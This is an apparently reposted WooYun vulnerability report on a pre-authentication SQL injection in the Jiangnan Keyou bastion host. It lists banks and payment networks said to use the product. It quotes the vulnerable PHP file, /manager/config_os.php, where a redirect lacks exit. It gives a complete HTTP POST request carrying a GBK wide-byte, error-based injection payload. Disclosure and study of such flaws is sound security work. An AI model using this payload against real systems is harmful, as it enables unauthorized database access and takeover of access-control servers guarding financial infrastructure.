江南科友堡垒机无需登录通用注入漏洞

2015年6月24日13:10:54评论555 views字数 231阅读0分46秒阅读模式

摘要

2014-09-26：细节已通知厂商并且等待厂商处理中
2014-09-28：厂商已经确认，细节仅向厂商公开
2014-10-01：细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航、无声信息）
2014-11-22：细节向核心白帽子及相关领域专家公开
2014-12-02：细节向普通白帽子公开
2014-12-12：细节向实习白帽子公开
2014-12-23：细节向公众公开

漏洞概要关注数(8) 关注此漏洞

缺陷编号： WooYun-2014-77088

漏洞标题：江南科友堡垒机无需登录通用注入漏洞

漏洞作者： conqu3r

提交时间： 2014-09-26 09:09

公开时间： 2014-12-23 09:10

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

3人收藏

漏洞详情

披露状态：

简要描述：

通用注入漏洞，不需要登录！

详细说明：

江南科友堡垒机全版本getshell（无需登录）

#1 漏洞设计客户如下：

国内各大银行：中国银行、民生银行、广东发展银行、平安银行、深圳发展银行、浦发银行、渤海银行总行及各分行、中国工商银行、中国农业银行、中国建设银行、交通银行、招商银行、中信银行、兴业银行、华夏银行、中国邮政储蓄银行总行或部分分行

中国银联：总公司及北京、广州、深圳、南京、福州、长沙、武汉、济南、青岛、沈阳、郑州、海口、天津、香港、厦门等分公司

银联数据：全国卡系统业务托管商业银行

外资银行：渣打银行、东亚银行：全国境内各个分行

外资金融机构：韩亚银行、花旗银行、通用电气、星展银行、美国第一资讯（FDC)

地方商业银行及农村信用社：40余家商业银行及农村信用社

社会保障与公共交通系统：湖北、黑龙江、广东、北京等社保卡安全系统，上海市公交一卡通安全系统，杭州市市民卡系统，长春一汽企业IC卡加密系统，宁波市民卡系统，郑州交通一卡通系统，山东一卡通系统

（摘自官网：http://**.**.**.**/JN_case/case-cg.aspx）

请自查....

漏洞证明：

存在GBK宽字节注入。

漏洞文件/manager/config_os.php

code 区域

<?
    require_once('interface.php');
    require_once('SSO_DB.php');
    require_once('class.smarttemplate.php');
    
    //session_id(SID);
    session_start();
    $account_os=$_SESSION['account_os'];
    $time = $_SESSION['time'];
    $error=0;
    //echo $time;
    //echo $_GET['flag'];
    if( empty($account_os) || $_GET['flag'] != $time || empty($_GET['flag']) )
    {
     Header("Location: login.php"); //没有增加exit(1)导致后续语句继续执行，并没有退出，后续就可以直接注入了。
    }
    $st = new SmartTemplate('config_os.html'); 
    $db = new SSO_DB();
    if(isset($_POST['action']) && !empty($_POST['action']))//ɾ������ҳ��
    {
     if($_POST['action'] == 'add')  //���
     {
      $add_s=$db->os_add($_POST['f_os_name'],$_POST['v_os_name'],$_POST['os_mem'],$_POST['AdminCmd_value'],$_POST['AdminPassInfo_value']);
      if(!$add_s)
      {
       //echo '<script type="text/javascript">';
       //echo 'alert("����ϵͳ����Ѵ���")';
       //echo '</script>';
       $error = -1;
      }
      else
      {
       write_ed();
       //echo '<script type="text/javascript">';
       //echo 'alert("��ӳɹ�")';
       //echo '</script>';
       $error = 1;
      }
     }
     if($_POST['action'] == 'del')  //ɾ��
     {
      //echo $_POST['post_id'];
      $db->os_del($_POST['post_id']);
      write_ed();
      //echo '<script type="text/javascript">';
      //echo 'alert("ɾ��ɹ�")';
      //echo '</script>';
      $error = 2;
     }
    }
    if(isset($_POST['edit_id']) && $_POST['action']== 'edit' && !empty($_POST['edit_id']) )  //�༭ȡ���
    {
     
      $db->os_edit($_POST['f_os_name'],$_POST['v_os_name'],$_POST['os_mem'],$_POST['edit_id'],$_POST['AdminCmd_value'],$_POST['AdminPassInfo_value']); //GBK注入
      write_ed();
      //echo '<script type="text/javascript">';
      //echo 'alert("�༭�ɹ�")';
      //echo '</script>';
      $error = 3;
    }

利用payload:

code 区域

POST /manager/config_os.php HTTP/1.1
 Host: x.x.x.x
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Proxy-Connection: keep-alive
 Cookie: PHPSESSID=676fe13cb82d5ba15baccdd1decc0beb
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/600.1.17 (KHTML, like Gecko) Version/7.1 Safari/537.85.10
 Accept-Language: zh-cn
 Accept-Encoding: gzip, deflate
 Connection: keep-alive
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 209
 
 action=add&f_os_name=admin%df'and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a)#&v_os_name=1&os_mem=2&admincmd_value=3&adminpassinfo_value=4

该文件的add del方法都存在注入。

修复方案：

处理

版权声明：转载请注明来源 conqu3r@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：12

确认时间：2014-09-28 09:42

厂商回复：

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2014-09-24 11:58 | 孔卡 ( 实习白帽子 | Rank:42 漏洞数:12 | 我已经过了那个餐桌上只有一条鸡腿就一定能...)

0

这是下一个网康的节奏吗？？？？

1# 回复此人
2014-09-30 19:54 | conqu3r ( 普通白帽子 | Rank:156 漏洞数:21 | 没有思想，没有道德，没有自由，没有人权的...)

0

@xsser 这个居然没发钱啊！

2# 回复此人

漏洞概要 关注数(8) 关注此漏洞

缺陷编号： WooYun-2014-77088

漏洞标题： 江南科友堡垒机无需登录通用注入漏洞

相关厂商： 江南科友科技有限公司

漏洞作者： conqu3r

提交时间： 2014-09-26 09:09

公开时间： 2014-12-23 09:10

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 20

漏洞状态： 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 无

3人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 conqu3r@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(8) 关注此漏洞

漏洞标题：江南科友堡垒机无需登录通用注入漏洞

相关厂商：江南科友科技有限公司

危害等级：高

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签：无

漏洞评价(共0人评价):

登陆后才能进行评分